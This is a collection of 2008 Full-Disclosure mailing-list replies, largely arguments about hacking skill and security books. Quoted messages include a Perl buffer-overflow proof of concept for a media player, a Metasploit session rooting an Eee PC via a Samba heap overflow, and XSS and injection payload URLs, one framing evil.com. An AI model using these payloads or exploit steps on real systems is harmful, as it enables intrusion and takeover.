Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
On Wed, Mar 19, 2008 at 8:49 AM, nnp [EMAIL PROTECTED] wrote: Man, you're wasting your breath with these people. There's no point in arguing with someone who's willing to title something as 'The best book ever'. Common sense says that unless you're going to get experts from every security field to contribute the sum total of their knowledge then you're kidding yourself. It will be a decent reference book on easy hacks at best. I saw just leave them off. If something good comes of it then great, if not then at least you haven't wasted your time berating someone that won't listen. I do not want another horrible 'security' book polluting the market and ruining more kids who could maybe become skilled people later. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [full disclosure] agile hacking?
I think this post sums up best the problem with the hacking exposed series and the direction pdp's book is going. Hacking exposed does not explain anything it only teaches tools and results. I much prefer books like 'hacking the art of exploitation', 'the art of software security assessment', and 'secrets of reverse engineering' because they are tool agnostic and teach the low level concepts that are going on. If I was hiring people I would much rather someone who understand the details of how something worked then someone who can only rely on tools and scripts. Publishing these books only hurts the 'community' by breeding more kiddies who rely on tools to do everything for them. On Wed, Mar 19, 2008 at 1:35 PM, [EMAIL PROTECTED] wrote: On Wed, 19 Mar 2008 17:30:08 -, Petko D. Petkov said: moreover, the project is not a Phrack knock-off as you said. It is very different. As I said, it wont contain explanations but like hands on tips/tricks and techniques even the most knowledgeable can learn from or use as a base reference. Without an explanation of *why* a given tip/trick works, it's hard to learn from. For example, consider the question of Tell me how many processes called 'xyzzy' are running on a system. The naive answer is: % ps ax | grep xyzzy | wc -l However, that generates an off-by-one error because it catches the grep itself. % ps ax | grep '[x]yzzy' | wc -l Does what you wanted - but without an understanding of *why* that regexp doesn't match itself when the first example does, you can't apply the more general concept of regexps that do/don't match themselves to *other* uses. (The secret here - the second regexp is *effectively* identical to the first, but says look for an x next to a y in a way that doesn't itself have an x adjacent to a y). So you need an explanation. (The fact that a process can re-write its argv[0] and change the name displayed by ps is yet another teachable moment - does that mean that you really want the name it was invoked under and should add the 'ps' flag that gives that, or do you really want the number of processes that have that modified argv value set? For instance, if you're using 'sendmail', there are a number of states a given copy can be in, and you can do a status summary by counting the number of 'accepting connections', 'rejecting connections', 'running queue' and other similar indicators. But again, you need an explanation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
Just because you call me troll doesn't mean you should ignore my questions. Who is your book aimed towards? You said this will be the ' best hacking reference/manual/book ever made' . Doesn't that mean it should contain lots of low level/kernel level exploitation of which you are incapable? Covering web based stuff doesn't exactly qualify a book as the best hacking reference ever made. It seems you are going to write a grand manual for script kiddies and other non-talented people who like to run scripts and perform XSS. Also I find it funny you told rzn that you think of more original ideas everyday then he does when your two 'ideas' for the book were: 1) running kismet and tcpdump at the same time 2) 'How can you write a small .COM virus without a compiler or any other dev tools?' Seeing how both of these have been 1000s of times ( http://www.awarenetwork.org/home/iqlord/articles/extreme.coding.txt ) how are your ideas original or interesting? Your book is going to be lame and grouped in with the mitnick books, how to own series, and 'hacking exposed' collection. I guess this isn't new to you since only CISSPs liked your previous work anyway. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
I see thoth responded negatively to your project and again you assume that if someone bashes you that he/she has no skill and is just trolling. This means you obviously were not as his kiwicon talk or read the slides ( not that you would understand them ) but it shows how arrogant you are. you are just another sad leader who has amassed a following of idiots and when someone speaks out against you act all high and mighty when really they are better than you. I also think its funny that you say how its a 'community project' and that you are uniting all these people together when in truth its a bunch of clueless kiddies ( I am sure you will get a great article from the kid who will 'create b0f overfl0wz' as he put it) who follow you while people 'with a clue' know you are a joke. Either way if this book somehow gets published it will be another laughing stock like the rest of your published work. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
On Tue, Mar 18, 2008 at 10:36 PM, Nate McFeters [EMAIL PROTECTED] wrote: I don't consider myself a 'kiddie' and I've considered contributing to it. I feel like the old adage of blowing out someone elses flame to make yours burn brighter applies here. Reepex, I didn't get a chance to see your presentation at kiwicon, bit to expensive for an American on a tight budget to get out there, but if you have a link, I'd love to have a look. We've talked before, so I assume the presentation is good since I know you know your stuff; however, I've also seen some cool stuff come out of PDP and Gnucitizen... why the need to bash? I did not give the talk, thoth did. The reason I brought it up is because of http://www.gnucitizen.org/blog/agile-hacking/#comment-116766 where pdp blindly assumes thoth does not have a clue, while not knowing his background which must be some strange complex where people think anyone who disagrees with them is inferior. Web app hacking may not be the coolest topic in the world to yourself and many others, but it is something that a lot of companies are concerned with these days, Yes and we agreed web hacking has its place... the point I made was that you cannot write 'the best hacking manual ever made' as pdp is touting it while only covering web hacking and running combinations of different tools such as kismet/tcpdump that pdp mentined as an example. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager
While I am sure MS is now trembling at the disclosure of such a high impact bug, I am wondering why you chose core-security.net as your domain when core security (.com) is already known as a leading security company with a good name? On Fri, Mar 14, 2008 at 2:49 PM, SkyOut [EMAIL PROTECTED] wrote: Dear list, after weeks of total ignorance by Microsoft I decided to finally release all information related to a bug, that has to do with the Windows XP SP2 Taskmanager. Manipulating a Registry key makes it possible to disable the Taskmgr. On the next startup it will crash with an error message. It is possible to backup the key and repair the Registry doing so, but the attack scenario is clear: A virus uses this code, the user can't open the Taskmgr anymore and your process is somehow hidden. The full information about this bug, can be found here: http://core-security.net/archive/2008/march/index.php#14032008 And the exploit is available here: http://core-security.net/releases/exploits/taskmgr_dos.c.txt Greets, SkyOut --- core-security.net --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)
can you please stop sending this retarded crap... we all know how much talent it takes to write thousands of As to a file and then open it with every application on cnet download.com and sourceforge but we do not care On Fri, Feb 15, 2008 at 12:07 PM, lorenzo [EMAIL PROTECTED] wrote: ### #Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) # # @nolife : Pow...Pow ..If you are kind i'll show you my set of supers mega Tools, fuzzers ,and all the automated stuff i use For M3U/ASX/PLS Pow..Pow ... # Nolifing is actually a Disease... Do not be mean with nolife's # # # eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c edi=00ba9078 # eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 # RosoftMediaPlayerFree+0x3b9c: # 00403b9c 8b10mov edx,dword ptr [eax] ds:0023:41414141= # # my $chars= A x 4104; my $file=I_Shot_The_Nolife.m3u; open(my $FILE, $file) or die Cannot open $file: $!; print $FILE $chars; close($FILE); print $file has been created \n; print Credits:Securfrog; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] let's name something after dude vanwinkle
On Fri, Feb 15, 2008 at 11:43 AM, worried security [EMAIL PROTECTED] wrote: gadi evron is a born leader is this a joke? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)
I could not agree more! no talent = do not post ... every one else agree with me and securfrog? On Fri, Feb 15, 2008 at 2:06 PM, securfrog [EMAIL PROTECTED] wrote: Well ... nice vision here ... then in this case , let's stop posting injection sql , xss , rfi , lfi and all kind of web application bugs . We know how much talent it takes to find theses bugs,on these cms you can find , on cnet , download.com , sourceforge and stuff. [ var=123 var=-1+union/* = wow .. injection var=scriptalert(document.cookie)/script = wow xss var=http://bla.com/file.txt? = wow code exec etc ... ] Let's do the same with ftp servers , finding a CWD AA crash is pretty dummy to doh. Bugs are now rated by originality, not the impact , thanks for the notification reepex . 2008/2/15, reepex [EMAIL PROTECTED]: can you please stop sending this retarded crap... we all know how much talent it takes to write thousands of As to a file and then open it with every application on cnet download.com and sourceforge but we do not care On Fri, Feb 15, 2008 at 12:07 PM, lorenzo [EMAIL PROTECTED] wrote: ### #Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U) # # @nolife : Pow...Pow ..If you are kind i'll show you my set of supers mega Tools, fuzzers ,and all the automated stuff i use For M3U/ASX/PLS Pow..Pow ... # Nolifing is actually a Disease... Do not be mean with nolife's # # # eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c edi=00ba9078 # eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 # RosoftMediaPlayerFree+0x3b9c: # 00403b9c 8b10mov edx,dword ptr [eax] ds:0023:41414141= # # my $chars= A x 4104; my $file=I_Shot_The_Nolife.m3u; open(my $FILE, $file) or die Cannot open $file: $!; print $FILE $chars; close($FILE); print $file has been created \n; print Credits:Securfrog; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
Why do I get such nonsense said about me because I point out that Eric Harrison is a script kiddie, Simon Smith is in need of a new security team, and throwing 5000 As into a buffer is not hacking :( On Feb 9, 2008 10:36 AM, SilentRunner [EMAIL PROTECTED] wrote: Amusing isn't it that everytime someone tells reepex to shutup, he/she acts as if he/she has a personal or business relationship with them, and that somehow he/she is important to this person. What transparent bollocks. Are you referring to Simon Smith? I assume you are. It is just strange that he would tell me so many times in email how inadequate and useless his security team is and how he wanted me to work for them, only to then make fun of me. It seems his is jealous/angry at me for not going with his company. It's the exact tactic used on us when running into one's annoying hosebeast of an ex while out with the new missus, and she says but you told me last night you loved me, even tho you haven't seen the mad bitch for 2 years. reepex has done this at least 3 times in the last 3 months and it pretty neatly ages him/her to his/her late teens. After reading this I believe you are a classic E-Psychiatrist [1] reepex has not contributed one useful thing to full disclosure, so I'm more than happy to join with the increasing majority, who would like it if he/she STFU. Yes I have. Ask coderman about my amazing revelation of htaccess in the url last week, while everyone was talking about 'firefox vulnerabilities' The good news is that if reepex were older and still exhibiting the same psycho-ex-girlfriend behaviour, it is highly unlikely that no- one will want to breed with it, so at least the line will stop there. Please see [1]. [1] http://www.encyclopediadramatica.com/E-Psychiatrist ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
the default OS 1gb ram limit is very lame, and has made everyone I know install another OS On Feb 8, 2008 2:21 PM, [EMAIL PROTECTED] wrote: Hi, It is a remote root exploit on a very popular piece of hardware, you don't think that is a big deal? from what I've read, most people are sticking WinXP or Ubuntu onto these EEPCs as soon as they get them alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight? On Feb 8, 2008 10:47 AM, RISE Security [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org. Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default). eeepc-rise:/root ps -e PID TTY TIME CMD 1 ?00:00:00 fastinit 2 ?00:00:00 ksoftirqd/0 3 ?00:00:00 events/0 4 ?00:00:00 khelper 5 ?00:00:00 kthread 25 ?00:00:00 kblockd/0 26 ?00:00:00 kacpid 128 ?00:00:00 ata/0 129 ?00:00:00 ata_aux 130 ?00:00:00 kseriod 148 ?00:00:00 pdflush 149 ?00:00:00 pdflush 150 ?00:00:00 kswapd0 151 ?00:00:00 aio/0 152 ?00:00:00 unionfs_siod/0 778 ?00:00:00 scsi_eh_0 779 ?00:00:00 scsi_eh_1 799 ?00:00:00 kpsmoused 819 ?00:00:00 kjournald 855 ?00:00:00 fastinit 857 ?00:00:00 sh 858 ?00:00:00 su 859 tty3 00:00:00 getty 862 ?00:00:00 startx 880 ?00:00:00 xinit 881 tty2 00:00:06 Xorg 890 ?00:00:00 udevd 952 ?00:00:00 ksuspend_usbd 953 ?00:00:00 khubd 1002 ?00:00:00 acpid 1027 ?00:00:00 pciehpd_event 1055 ?00:00:00 ifplugd 1101 ?00:00:00 scsi_eh_2 1102 ?00:00:00 usb-storage 1151 ?00:00:00 icewm 1185 ?00:00:01 AsusLauncher 1186 ?00:00:00 icewmtray 1188 ?00:00:01 powermonitor 1190 ?00:00:00 minimixer 1191 ?00:00:00 networkmonitor 1192 ?00:00:00 wapmonitor 1193 ?00:00:00 x-session-manag 1195 ?00:00:00 x-session-manag 1200 ?00:00:00 x-session-manag 1201 ?00:00:00 dispwatch 1217 ?00:00:00 cupsd 1224 ?00:00:00 usbstorageapple 1234 ?00:00:00 kondemand/0 1240 ?00:00:00 portmap 1248 ?00:00:00 keyboardstatus 1272 ?00:00:00 memd 1279 ?00:00:00 scim-helper-man 1280 ?00:00:00 scim-panel-gtk 1282 ?00:00:00 scim-launcher 1297 ?00:00:00 netserv 1331 ?00:00:00 asusosd 1476 ?00:00:00 xandrosncs-agen 1775 ?00:00:00 dhclient3 2002 ?00:00:00 nmbd 2004 ?00:00:00 smbd 2005 ?00:00:00 smbd 2322 ?00:00:00 sshd 2345 ?00:00:00 sshd 2356 pts/000:00:00 bash 2362 pts/000:00:00 ps eeepc-rise:/root Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year. eeepc-rise:/root smbd --version Version 3.0.24 eeepc-rise:/root With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based). msf use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) set RHOST 192.168.50.10 RHOST = 192.168.50.10 msf exploit(lsa_transnames_heap) set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD = linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) show targets Exploit targets: Id Name -- 0 Linux vsyscall 1 Linux Heap Brute Force (Debian/Ubuntu) 2 Linux Heap Brute Force (Gentoo) 3 Linux Heap Brute Force (Mandriva) 4 Linux Heap Brute Force (RHEL/CentOS) 5 Linux Heap Brute Force (SUSE) 6 Linux Heap Brute Force (Slackware) 7 DEBUG msf exploit(lsa_transnames_heap) set TARGET 1 TARGET = 1 msf exploit(lsa_transnames_heap) exploit [*] Started bind handler [*] Creating nop sled ... [*] Trying to exploit Samba with address 0x08415000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 - 192.168.50.10:) msf exploit(lsa_transnames_heap) sessions -i 1 [*] Starting interaction with 1... uname -a Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id uid=0(root)
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
yes and no where in here includes 'make some media hyped report blog crap for 5 minutes of fame' On Feb 8, 2008 2:27 PM, [EMAIL PROTECTED] wrote: Security research should go as follows, run some type of scanner to find known issues (low hanging fruit). Use your skill to manually try to find threats then manually create an exploit then report the issue after verified. -Original Message- From: reepex [EMAIL PROTECTED] Sent: Friday, February 8, 2008 2:38pm To: RISE Security [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight? On Feb 8, 2008 10:47 AM, RISE Security [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org. Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default). eeepc-rise:/root ps -e PID TTY TIME CMD 1 ?00:00:00 fastinit 2 ?00:00:00 ksoftirqd/0 3 ?00:00:00 events/0 4 ?00:00:00 khelper 5 ?00:00:00 kthread 25 ?00:00:00 kblockd/0 26 ?00:00:00 kacpid 128 ?00:00:00 ata/0 129 ?00:00:00 ata_aux 130 ?00:00:00 kseriod 148 ?00:00:00 pdflush 149 ?00:00:00 pdflush 150 ?00:00:00 kswapd0 151 ?00:00:00 aio/0 152 ?00:00:00 unionfs_siod/0 778 ?00:00:00 scsi_eh_0 779 ?00:00:00 scsi_eh_1 799 ?00:00:00 kpsmoused 819 ?00:00:00 kjournald 855 ?00:00:00 fastinit 857 ?00:00:00 sh 858 ?00:00:00 su 859 tty3 00:00:00 getty 862 ?00:00:00 startx 880 ?00:00:00 xinit 881 tty2 00:00:06 Xorg 890 ?00:00:00 udevd 952 ?00:00:00 ksuspend_usbd 953 ?00:00:00 khubd 1002 ?00:00:00 acpid 1027 ?00:00:00 pciehpd_event 1055 ?00:00:00 ifplugd 1101 ?00:00:00 scsi_eh_2 1102 ?00:00:00 usb-storage 1151 ?00:00:00 icewm 1185 ?00:00:01 AsusLauncher 1186 ?00:00:00 icewmtray 1188 ?00:00:01 powermonitor 1190 ?00:00:00 minimixer 1191 ?00:00:00 networkmonitor 1192 ?00:00:00 wapmonitor 1193 ?00:00:00 x-session-manag 1195 ?00:00:00 x-session-manag 1200 ?00:00:00 x-session-manag 1201 ?00:00:00 dispwatch 1217 ?00:00:00 cupsd 1224 ?00:00:00 usbstorageapple 1234 ?00:00:00 kondemand/0 1240 ?00:00:00 portmap 1248 ?00:00:00 keyboardstatus 1272 ?00:00:00 memd 1279 ?00:00:00 scim-helper-man 1280 ?00:00:00 scim-panel-gtk 1282 ?00:00:00 scim-launcher 1297 ?00:00:00 netserv 1331 ?00:00:00 asusosd 1476 ?00:00:00 xandrosncs-agen 1775 ?00:00:00 dhclient3 2002 ?00:00:00 nmbd 2004 ?00:00:00 smbd 2005 ?00:00:00 smbd 2322 ?00:00:00 sshd 2345 ?00:00:00 sshd 2356 pts/000:00:00 bash 2362 pts/000:00:00 ps eeepc-rise:/root Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year. eeepc-rise:/root smbd --version Version 3.0.24 eeepc-rise:/root With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based). msf use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) set RHOST 192.168.50.10 RHOST = 192.168.50.10 msf exploit(lsa_transnames_heap) set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD = linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) show targets Exploit targets: Id Name -- 0 Linux vsyscall 1 Linux Heap Brute Force (Debian/Ubuntu) 2 Linux Heap Brute Force (Gentoo) 3 Linux Heap Brute Force (Mandriva) 4 Linux
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] wrote: I appreciate knowing that I can visit my friends homes and root their boxes while they order pizza wirelessly on their couch. So you can 'root' your friends with a public vulnerability and exploit you didn't write? Isn't this what most people would call a script kiddie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASUS Eee PC rooted out of the box
hey simon, Are you still looking to replace your security team because of their inadequacies? You seemed pretty desperate for skilled workers last time we talked. On Feb 8, 2008 3:28 PM, Simon Smith [EMAIL PROTECTED] wrote: You would know. ;] reepex wrote: On Feb 8, 2008 3:15 PM, Erik Harrison [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: I appreciate knowing that I can visit my friends homes and root their boxes while they order pizza wirelessly on their couch. So you can 'root' your friends with a public vulnerability and exploit you didn't write? Isn't this what most people would call a script kiddie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability
your 'disclosure' is lame and so is your site. Could you please never email here again On Feb 6, 2008 1:06 PM, SkyOut [EMAIL PROTECTED] wrote: I know its basic, but I am a supporter of FD and therefore planetluc.com has to be blamed now! I checked their script MyNews in version 1.6.4 today and then some other versions, all are vulnerable to HTML and JS injection. --- ADVISORY --- || WWW.SMASH-THE-STACK.NET || - || ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability _ || 0x00: ABOUT ME || 0x01: DATELINE || 0x02: INFORMATION || 0x03: EXPLOITATION || 0x04: GOOGLE DORK || 0x05: RISK LEVEL _ || 0x00: ABOUT ME Author: SkyOut Date: February 2008 Contact: skyout[-at-]smash-the-stack[-dot-]net Website: http://www.smash-the-stack.net/ _ || 0x01: DATELINE 2008-02-06: Bug found 2008-02-06: Advisory released || 0x02: INFORMATION The MyNews script by planetluc.com in all versions of the 1.6.X tree is vulnerable to HTML and JS injection due to no sanitation of the hash value in combination with the action admin. _ || 0x03: EXPLOITATION No exploit is needed to test this vulnerability. You just need a working web browser. 1: HTML Injection To make a HTML injectioni, visit the websites main page. The name might differ from the original name mynews.inc.php, mostly its called index.php. Now construct a malformed URL as follows: http://www.example.com/index.php?hash=;iframe src=http:// www.evil.com/ height=500px width=500px/iframe!--do=admin Of course you can manipulate the values of height and width like you want to. Do it the way it best fits to your needs! 2: JavaScript Injection JS injection is similar to HTML injection, just that you put a JS code in the hash parameter. Let me show you two examples: http://www.example.com/index.php?hash=;scriptalert(1337);/ script!--do=admin or http://www.example.com/index.php?hash=;scriptalert(XSS);/ script!--do=admin Sometimes using strings doesn't work, so test it first! || 0x04: GOOGLE DORK intext:powered by MyNews 1.6.* ___ || 0x05: RISK LEVEL - LOW - (1/3) - ! Happy Hacking ! THE END --- ADVISORY --- Sincerely, SkyOut ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities
I am not sure the intended point of the exploit since you have @roguehost and not a proper POC, but I believe all you have triggered is normal behavior for auto logging into .htaccess protected folders in the form username:[EMAIL PROTECTED] http://forum.sambarserver.info/viewtopic.php?p=288 http://www.freewebmasterhelp.com/tutorials/htaccess/3 I did it with google.com and @mail.yahoo.com and it tried to log me into mail.yahoo.com with google as my username as expected On Feb 4, 2008 2:10 PM, carl hardwick [EMAIL PROTECTED] wrote: Firefox seems to have trouble with defining the proper hostname when requesting a ssl connection. I was able to trick Firefox in thinking the hostname behind the at-sign is legit and the same as the URI that requested an ssl connection, and this without a warning. PoC: https://[EMAIL PROTECTED] You can add as much garbage between .com and the @ sign. So what else can we do? PoC: [EMAIL PROTECTED] [EMAIL PROTECTED] ah heck we don't need that at all: [EMAIL PROTECTED] works fine also :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone
lol best troll ever On 1/28/08, Donald Republic [EMAIL PROTECTED] wrote: Dear Full Disclosure, We are writing to you in behalf of Bart Cilfone. He has asked us to contact you and see if you will consider removing the content about him at: http://seclists.org/fulldisclosure/2008/Jan/0497.html Please allow us to introduce ourselves. We are ReputationDefender, Inc., a company dedicated to helping our clients preserve their good name on the Internet. Our founders and employees are all regular Internet users. Like our clients, and perhaps like you, we think the Internet is sometimes unnecessarily hurtful to the privacy and reputations of everyday people. Even content that is meant to be informative can sometimes have a significant and negative impact on someone's job prospects, student applications, and personal life. We invite you to learn more about who we are, at www.reputationdefender.com. When our clients sign up with our service, we undertake deep research about them on the Internet to see what the Web is saying about them. We find sites where they are discussed, and we ask our clients how they feel about those sites. Sometimes our clients express strong reservations about the content on particular websites. They may feel hurt, ashamed, or invaded by the content about them on those sites. As you may know, more and more prospective employers, universities, and newfound friends and romantic interests undertake Internet research, and the material they find can strongly impact their impressions of the people they are getting to know. When people apply for jobs, apply for college or graduate school, apply for loans, begin dating, or seek to do any number of other things with their lives, hurtful content about them on the Internet can have a negative impact on their opportunities. At some point or another, most of us say things about ourselves or our friends and acquaintances we later regret. We're all human, and we all do it! We are writing to you today because our client, Bart Cilfone, has told us that he would like the content about him on your website to be removed as it is outdated and disturbing to him. Would you be willing to remove or alter the content? It would mean so much to Mr. Cilfone, and to us. Considerate actions such as these will go a long way to help make the Internet a more civil place. Thank you very much for your consideration. We are mindful that matters like these can be sensitive. We appreciate your time. Please let us know if you have removed or changed the content on this site by sending an e-mail to: [EMAIL PROTECTED] Yours sincerely, Donald Republic Reputation Defender Service Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] old junk
so mr prdelka - how can you act so blackhat when releasing exploits? Did you write these exploits yourself or did you pawn these off ilja as usual? On 1/21/08, Micheal Turner [EMAIL PROTECTED] wrote: old junk from 2007. roll on 2008! cb payload busted in rshd exploit. enjoy. http://rapidshare.com/files/85400481/prdelka-vs-GNU-citadel.tar.gz.html http://rapidshare.com/files/85400619/prdelka-vs-MS-rshd.tar.gz.html __ Sent from Yahoo! Mail - a smarter inbox http://uk.mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
... if base64 was challenging for you then maybe you should switch fields of work On Jan 21, 2008 9:04 PM, Maxim [EMAIL PROTECTED] wrote: that was fun ... :-) stuff like that should be on people's job interviews. On Mon, 2008-01-21 at 21:59 -0500, [EMAIL PROTECTED] wrote: Remember that although 99.98% of the Internet population ends up using it, 99.97% are totally unaware of the fact because they have point-n-drool GUI interfaces to hide the gory details from them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )
